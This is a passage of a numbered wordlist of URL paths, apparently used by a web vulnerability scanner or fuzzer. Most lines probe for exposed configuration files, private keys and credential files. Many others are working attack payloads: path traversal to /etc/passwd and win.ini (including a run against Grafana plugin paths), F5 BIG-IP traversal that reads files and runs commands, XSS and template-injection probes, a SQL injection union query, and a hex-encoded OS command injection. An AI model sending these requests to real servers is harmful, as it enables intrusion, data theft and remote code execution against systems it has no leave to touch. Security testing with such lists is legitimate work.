/nbproject/project.properties 2906 | /nextcloud/index.php/login 2907 | /nginx.conf 2908 | /nginx_status 2909 | /ngrok2/ngrok.yml 2910 | /nifi-api/access/config 2911 | /node.json 2912 | /node/1?_format=hal_json 2913 | /node/details.json 2914 | /node_info 2915 | /node_info.json 2916 | /node_stats 2917 | /npm-debug.log 2918 | /npm-shrinkwrap.json 2919 | /nuxeo/login.jsp/pwn${31333333330+7}.xhtml 2920 | /OA_HTML/bin/sqlnet.log 2921 | /OA_HTML/jtfwrepo.xml 2922 | /oab/ 2923 | /oauth-credentials.json 2924 | /oauth/token 2925 | /occ/v2/d2OzBcy 2926 | /ocsp/ 2927 | /old/vendor/phpunit/phpunit/phpunit 2928 | /old_phpinfo.php 2929 | /oldsite/vendor/phpunit/phpunit/phpunit 2930 | /opcache 2931 | /opcache-status/ 2932 | /opcache-status/opcache.php 2933 | /openapi.json 2934 | /openapi.yaml 2935 | /Orion/Login.aspx 2936 | /os/mxperson 2937 | /out_heap_dump 2938 | /ovirt-engine/ 2939 | /owa/ 2940 | /owa/auth/logon.aspx 2941 | /owncloud/config/ 2942 | /package 2943 | /package-lock.json 2944 | /package.json 2945 | /pages 2946 | /pages/includes/status 2947 | /parameters.yml 2948 | /parameters.yml.dist 2949 | /Partners/application/configs/application.ini 2950 | /pdb/meta/v1/version 2951 | /PDC/ajaxreq.php?PARAM=127.0.0.1+ 2952 | /perl 2953 | /perl-status 2954 | /persistentchat/ 2955 | /phoneconferencing/ 2956 | /php 2957 | /php-fpm.conf 2958 | /php-info.php 2959 | /php-opcache-status/ 2960 | /php.ini 2961 | /php.php 2962 | /php/adminer.php 2963 | /php/phpmyadmin/ 2964 | /php_info.php 2965 | /phpinfo.php 2966 | /phpmyadmin/ 2967 | /phpMyAdmin/ 2968 | /phpPgAdmin 2969 | /phppgadmin/intro.php 2970 | /phpstan.neon 2971 | /phpunit.xml 2972 | /phpversion.php 2973 | /pimcore/app/config/pimcore/google-api-private-key.json 2974 | /pinfo.php 2975 | /playground 2976 | /plesk-stat/ 2977 | /plugin/build 2978 | /pluginManager 2979 | /plugins 2980 | /plugins/servlet/gadgets/makeRequest?url=https 2981 | /plugins/servlet/gadgets/makeRequest?url=https://google.com 2982 | /plugins/servlet/oauth/users/icon 2983 | /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 2984 | /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS 2985 | /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 2986 | /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test 2987 | /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 2988 | /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 2989 | /pma/ 2990 | /PMUser/ 2991 | /pods 2992 | /podSandboxStatus 2993 | /pools/default/buckets 2994 | /portal 2995 | /portal-graphql 2996 | /portal/favicon.ico 2997 | /portal/images/MyVue/MyVueHelp.png 2998 | /powershell/ 2999 | /pprof 3000 | /private 3001 | /private-key 3002 | /private.pem 3003 | /privatekey.key 3004 | /probes 3005 | /prod2local.sh 3006 | /production.log 3007 | /profile 3008 | /proftpd.conf 3009 | /properties.ini 3010 | /provider.tf 3011 | /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 3012 | /proxy 3013 | /proxy.pac 3014 | /proxy.stream?origin=http 3015 | /proxytest.jsp 3016 | /proxytui 3017 | /PRTG/index.htm 3018 | /prtg/index.htm 3019 | /prweb/PRRestService/unauthenticatedAPI/v1/docs 3020 | /public 3021 | /public/ 3022 | /public/adminer.php 3023 | /public/config.js 3024 | /public/plugins/alertGroups/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3025 | /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3026 | /public/plugins/alertmanager/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3027 | /public/plugins/annolist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3028 | /public/plugins/barchart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3029 | /public/plugins/bargauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3030 | /public/plugins/canvas/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3031 | /public/plugins/cloudwatch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3032 | /public/plugins/dashboard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3033 | /public/plugins/dashlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3034 | /public/plugins/debug/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3035 | /public/plugins/elasticsearch/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3036 | /public/plugins/gauge/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3037 | /public/plugins/geomap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3038 | /public/plugins/gettingstarted/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3039 | /public/plugins/grafana/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3040 | /public/plugins/graph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3041 | /public/plugins/graphite/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3042 | /public/plugins/heatmap/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3043 | /public/plugins/histogram/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3044 | /public/plugins/icon/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3045 | /public/plugins/influxdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3046 | /public/plugins/jaeger/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3047 | /public/plugins/live/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3048 | /public/plugins/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3049 | /public/plugins/loki/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3050 | /public/plugins/mixed/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3051 | /public/plugins/mssql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3052 | /public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3053 | /public/plugins/news/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3054 | /public/plugins/nodeGraph/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3055 | /public/plugins/opentsdb/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3056 | /public/plugins/piechart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3057 | /public/plugins/pluginlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3058 | /public/plugins/postgres/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3059 | /public/plugins/prometheus/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3060 | /public/plugins/stat/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3061 | /public/plugins/state-timeline/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3062 | /public/plugins/status-history/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3063 | /public/plugins/table-old/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3064 | /public/plugins/table/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3065 | /public/plugins/tempo/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3066 | /public/plugins/testdata/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3067 | /public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3068 | /public/plugins/timeseries/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3069 | /public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3070 | /public/plugins/xychart/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3071 | /public/plugins/zipkin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 3072 | /publicadminer.php 3073 | /pyproject.toml 3074 | /query 3075 | /query-api 3076 | /query-explorer 3077 | /query-laravel 3078 | /radio/application/configs/application.ini 3079 | /rails/actions?error=ActiveRecord 3080 | /rails/info 3081 | /rails/info/properties.json 3082 | /rails/info/routes.json 3083 | /railsapp/config/storage.yml 3084 | /reach/sip.svc 3085 | /read_file 3086 | /readfile 3087 | /README.md 3088 | /readme.txt 3089 | /readyz 3090 | /redmine/config/configuration.yml 3091 | /redmine/config/environment.rb 3092 | /redmine/config/initializers/secret_token.rb 3093 | /redmine/config/secrets.yml 3094 | /redmine/config/settings.yml 3095 | /redoc 3096 | /reminder.sh 3097 | /remote/login 3098 | /Reports/Pages/Folder.aspx 3099 | /ReportServer 3100 | /ReportServer/Pages/ReportViewer.aspx 3101 | /requesthandler/ 3102 | /requesthandlerext/ 3103 | /rest/api/2/dashboard?maxResults=100 3104 | /rest/api/2/project?maxResults=100 3105 | /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true 3106 | /rest/api/latest/serverInfo 3107 | /rest/beta/repositories/go/group 3108 | /rest/tinymce/1/macro/preview 3109 | /rgs/ 3110 | /rgsclients/ 3111 | /robomongo.json 3112 | /robots.txt 3113 | /robots.txt%2e%2e%3B/ 3114 | /robots.txt..%3B/ 3115 | /robots.txt../admin/ 3116 | /robots.txt..;/ 3117 | /robots.txt/%2e%2e%3B/ 3118 | /robots.txt/..%3B/ 3119 | /robots.txt/../admin/ 3120 | /robots.txt/..;/ 3121 | /roundcube 3122 | /roundcube/logs/errors.log 3123 | /roundcube/logs/sendmail 3124 | /routes/error_log 3125 | /rpc/ 3126 | /rpcwithcert/ 3127 | /ruby/config/storage.yml 3128 | /rulez 3129 | /run 3130 | /run.sh 3131 | /runningpods 3132 | /s/sfsites/aura 3133 | /s3cmd.ini 3134 | /s3proxy.conf 3135 | /sap/bc/gui/sap/its/webgui 3136 | /sap/hana/xs/formLogin/login.html 3137 | /sap/wdisp/admin/public/default.html 3138 | /sapi/debug/default/view 3139 | /scheduler/ 3140 | /schema 3141 | /schema.rb 3142 | /script 3143 | /scriptText 3144 | /search 3145 | /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 3146 | /search/token.json 3147 | /search?search_key={{1337*1338}} 3148 | /searchableSnapshots 3149 | /secret 3150 | /secret_token.rb 3151 | /secrets.yml 3152 | /secure/admin 3153 | /secure/ConfigurePortalPages!default.jspa?view=popular 3154 | /secure/ContactAdministrators!default.jspa 3155 | /secure/Dashboard.jspa 3156 | /secure/ManageFilters.jspa?filter=popular&filterView=popular 3157 | /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false 3158 | /secure/popups/UserPickerBrowser.jspa 3159 | /secure/QueryComponent!Default.jspa 3160 | /secure/ViewUserHover.jspa 3161 | /security.txt 3162 | /security.yml 3163 | /sell 3164 | /seminovos/application/configs/application.ini 3165 | /server 3166 | /server-info 3167 | /server-status 3168 | /server.key 3169 | /server/storage/ 3170 | /service 3171 | /service-account-credentials.json 3172 | /service/rest/swagger.json 3173 | /service?Wsdl 3174 | /servicedesk/customer/user/login 3175 | /servicedesk/customer/user/signup 3176 | /services/Version 3177 | /servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError 3178 | /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https 3179 | /servlist.conf 3180 | /sessions/new 3181 | /settings.php.bak 3182 | /settings.php.dist 3183 | /settings.php.old 3184 | /settings.php.save 3185 | /settings.php.swp 3186 | /settings.php.txt 3187 | /settings.py 3188 | /settings.yml 3189 | /settings/settings.py 3190 | /setup-config.php 3191 | /setup.sh 3192 | /sfsites/aura 3193 | /sftp-config.json 3194 | /share/page/dologin 3195 | /shop/ 3196 | /shop/application/configs/application.ini 3197 | /shutdown 3198 | /sidekiq 3199 | /site.sql 3200 | /site_cg/application/configs/application.ini 3201 | /sitecore/shell/sitecore.version.xml 3202 | /sitemanager.xml 3203 | /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit 3204 | /slow_query 3205 | /slow_query/ 3206 | /slow_query/all 3207 | /slr/application/configs/application.ini 3208 | /smb.conf 3209 | /solr/ 3210 | /spec 3211 | /sphinx 3212 | /sphinx-graphiql 3213 | /spring 3214 | /sql.sql 3215 | /ssl/localhost.key 3216 | /sslmgr 3217 | /stages/ 3218 | /startup.sh 3219 | /stat.jsp?cmd=chcp+437+%7c+dir 3220 | /static 3221 | /static%2e%2e%3B/ 3222 | /static..%3B/ 3223 | /static../.git/config 3224 | /static../admin/ 3225 | /static..;/ 3226 | /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini 3227 | /static/%2e%2e%3B/ 3228 | /static/..%3B/ 3229 | /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3230 | /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3231 | /static/..%5c..%5c..%5c..%5c..%5cetc/passwd 3232 | /static/..%5c..%5c..%5c..%5cetc/passwd 3233 | /static/..%5c..%5c..%5cetc/passwd 3234 | /static/..%5c..%5cetc/passwd 3235 | /static/..%5cetc/passwd 3236 | /static/../../../a/../../../../etc/passwd 3237 | /static/../admin/ 3238 | /static/..;/ 3239 | /static/api/swagger.json 3240 | /static/api/swagger.yaml 3241 | /static/emq.ico 3242 | /stats 3243 | /stats/summary 3244 | /status 3245 | /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E 3246 | /status.php 3247 | /status/selfDiscovered/status 3248 | /storage-capacity 3249 | /storage.yml 3250 | /storage/ 3251 | /storage/logs/laravel.log 3252 | /store/app/etc/local.xml 3253 | /subscriptions 3254 | /svnserve.conf 3255 | /swagger 3256 | /swagger-json 3257 | /swagger-resources 3258 | /swagger-resources/restservices/v2/api-docs 3259 | /swagger-ui 3260 | /swagger-ui.html 3261 | /swagger-ui.js 3262 | /swagger-ui/ 3263 | /swagger-ui/index.html 3264 | /swagger-ui/o2c.html 3265 | /swagger-ui/oauth2-redirect.html 3266 | /swagger-ui/swagger-ui.js 3267 | /swagger.json 3268 | /swagger.yaml 3269 | /swagger/api-docs 3270 | /swagger/doc.html 3271 | /swagger/doc.json 3272 | /swagger/index.html 3273 | /swagger/swagger 3274 | /swagger/swagger-ui.html 3275 | /swagger/swagger-ui.js 3276 | /swagger/ui/index 3277 | /swagger/ui/swagger-ui.js 3278 | /swagger/v1/api-docs 3279 | /swagger/v1/swagger.json 3280 | /swagger/v1/swagger.json/ 3281 | /swagger/v1/swagger.yaml 3282 | /swagger/v2/api-docs 3283 | /swagger/v2/swagger.json 3284 | /swagger/v2/swagger.yaml 3285 | /swaggerui/ 3286 | /sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9 3287 | /system 3288 | /system-diagnostics 3289 | /systemstatus.xml 3290 | /tag 3291 | /tag.json 3292 | /targets 3293 | /td-agent.log 3294 | /Telerik.Web.UI.DialogHandler.aspx 3295 | /Telerik.Web.UI.DialogHandler.aspx?dp=1 3296 | /Telerik.Web.UI.DialogHandler.axd?dp=1 3297 | /Telerik.Web.UI.WebResource.axd?type=rau 3298 | /telescope/requests 3299 | /temp.php 3300 | /temp.sql 3301 | /test 3302 | /test.cgi 3303 | /test.php 3304 | /test/config/secrets.yml 3305 | /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd 3306 | /threaddump 3307 | /Thumbs.db 3308 | /tiki 3309 | /time.php 3310 | /tmui/login.jsp 3311 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license 3312 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5 3313 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 3314 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 3315 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' 3316 | /tmui/tmui/login/welcome.jsp 3317 | /token.json 3318 | /tomcat-docs 3319 | /tomcat-status 3320 | /tool/view/phpinfo.view.php 3321 | /tools/adminer.php 3322 | /toolsadminer.php 3323 | /trace 3324 | /Trace.axd 3325 | /tracez 3326 | /tracing 3327 | /translate.sql 3328 | /translations/en.json 3329 | /tree 3330 | /ucwa/ 3331 | /ueditor/php/getRemoteImage.php 3332 | /ui 3333 | /ui/login.action 3334 | /ui/vault/auth 3335 | /unifiedmessaging/ 3336 | /update.sh 3337 | /uploads/ 3338 | /user 3339 | /user.ini 3340 | /user/0 3341 | /user/1 3342 | /user/2 3343 | /user/3 3344 | /user/login 3345 | /userportal/webpages/myaccount/login.jsp 3346 | /users.sql 3347 | /v0.1/ 3348 | /v1 3349 | /v1.0/ 3350 | /v1.37/info 3351 | /v1.37/version 3352 | /v1/ 3353 | /v1/altair 3354 | /v1/api-docs 3355 | /v1/api/graphql 3356 | /v1/explorer 3357 | /v1/graph 3358 | /v1/graphiql 3359 | /v1/graphiql.css 3360 | /v1/graphiql.js 3361 | /v1/graphiql.min.css 3362 | /v1/graphiql.min.js 3363 | /v1/graphiql.php 3364 | /v1/graphiql/finland 3365 | /v1/graphql 3366 | /v1/graphql-explorer 3367 | /v1/graphql.php 3368 | /v1/graphql/console 3369 | /v1/graphql/schema.json 3370 | /v1/graphql/schema.xml 3371 | /v1/graphql/schema.yaml 3372 | /v1/playground 3373 | /v1/subscriptions 3374 | /v2 3375 | /v2/altair 3376 | /v2/api-docs 3377 | /v2/api/graphql 3378 | /v2/explorer 3379 | /v2/graph 3380 | /v2/graphiql 3381 | /v2/graphiql.css 3382 | /v2/graphiql.js 3383 | /v2/graphiql.min.css 3384 | /v2/graphiql.min.js 3385 | /v2/graphiql.php 3386 | /v2/graphiql/finland 3387 | /v2/graphql 3388 | /v2/graphql-explorer 3389 | /v2/graphql.php 3390 | /v2/graphql/console 3391 | /v2/graphql/schema.json 3392 | /v2/graphql/schema.xml 3393 | /v2/graphql/schema.yaml 3394 | /v2/keys/ 3395 | /v2/playground 3396 | /v2/subscriptions 3397 | /v3 3398 | /v3/altair 3399 | /v3/api/graphql 3400 | /v3/explorer 3401 | /v3/graph 3402 | /v3/graphiql 3403 | /v3/graphiql.css 3404 | /v3/graphiql.js 3405 | /v3/graphiql.min.css 3406 | /v3/graphiql.min.js 3407 | /v3/graphiql.php 3408 | /v3/graphiql/finland 3409 | /v3/graphql 3410 | /v3/graphql-explorer 3411 | /v3/graphql.php 3412 | /v3/graphql/console 3413 | /v3/graphql/schema.json 3414 | /v3/graphql/schema.xml 3415 | /v3/graphql/schema.yaml 3416 | /v3/playground 3417 | /v3/subscriptions 3418 | /v3alpha/auth/authenticate 3419 | /v4/altair 3420 | /v4/api/graphql 3421 | /v4/explorer 3422 | /v4/graph 3423 | /v4/graphiql 3424 | /v4/graphiql.css 3425 | /v4/graphiql.js 3426 | /v4/graphiql.min.css 3427 | /v4/graphiql.min.js 3428 | /v4/graphiql.php 3429 | /v4/graphiql/finland 3430 | /v4/graphql 3431 | /v4/graphql-explorer 3432 | /v4/graphql.php 3433 | /v4/graphql/console 3434 | /v4/graphql/schema.json 3435 | /v4/graphql/schema.xml 3436 | /v4/graphql/schema.yaml 3437 | /v4/playground 3438 | /v4/subscriptions 3439 | /Vagrantfile 3440 | /var/jwt/private.pem 3441 | /var/lib/mysql/mysql/user.frm 3442 | /var/lib/postgresql/data/pg_hba.conf 3443 | /varz 3444 | /vendor/composer/installed.json 3445 | /vendor/phpunit/phpunit/phpunit 3446 | /vendor/webmozart/assert/.composer-auth.json 3447 | /verify.php?id=1&confirm_hash= 3448 | /version 3449 | /Version 3450 | /version.web 3451 | /views/ajax/autocomplete/user/a 3452 | /virtualems/Login.aspx 3453 | /VirtualEms/Login.aspx 3454 | /vpn/../vpns/cfg/smb.conf 3455 | /vpn/index.html 3456 | /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd 3457 | /web-console 3458 | /WEB-INF/web.xml 3459 | /web.config 3460 | /Web.config 3461 | /web/adminer.php 3462 | /web/debug/default/view 3463 | /web/home.html 3464 | /web/index.html 3465 | /web/manifest.json 3466 | /web/phpmyadmin/ 3467 | /web/settings/settings.py 3468 | /web/static/c 3469 | /web_caps/webCapsConfig 3470 | /webadmin/out 3471 | /webadmin/start/ 3472 | /webadmin/tools/systemstatus_remote.php 3473 | /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 3474 | /webadminer.php 3475 | /webalizer/ 3476 | /webapi/v1/system/accountmanage/account 3477 | /webapp/?fccc0\>5f43d=1 3478 | /webapps/ROOT/WEB-INF/web.xml 3479 | /webclient/Login.xhtml 3480 | /webconsole/webpages/login.jsp 3481 | /webmail/ 3482 | /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 3483 | /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 3484 | /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 3485 | /webmin/ 3486 | /webpack.config.js 3487 | /webpack.mix.js 3488 | /WebReport/ReportServer 3489 | /webstats/awstats.pl 3490 | /webticket/ 3491 | /webticket/webticketservice.svc 3492 | /webticket/webticketservice.svcabs/ 3493 | /wgetrc 3494 | /whoAmI/ 3495 | /wiki 3496 | /wordpress/wp-config.php 3497 | /wordpress/wp-content/debug.log 3498 | /wp 3499 | /wp-config-sample.php 3500 | /wp-config.php 3501 | /wp-includes/wp-db.php 3502 | /ws2020/ 3503 | /ws2021/ 3504 | /ws_ftp.ini 3505 | /www.key 3506 | /www/delivery/afr.php?refresh=10000&\),10000000);alert(1337);setTimeout(alert(\ 3507 | /xampp/phpmyadmin/ 3508 | /xmldata?item=all 3509 | /xmldata?item=CpqKey 3510 | /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri 3511 | /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 3512 | /xmlrpc.php 3513 | /xprober.php 3514 | /yarn.lock 3515 | /yii/vendor/phpunit/phpunit/phpunit 3516 | /zabbix.php?action=dashboard.view&dashboardid=1 3517 | /zend/vendor/phpunit/phpunit/phpunit 3518 | /zenphoto/zp 3519 | /zipkin/ 3520 | /zm/?view=log 3521 | /zp 3522 | /zp/zp 3523 | --------------------------------------------------------------------------------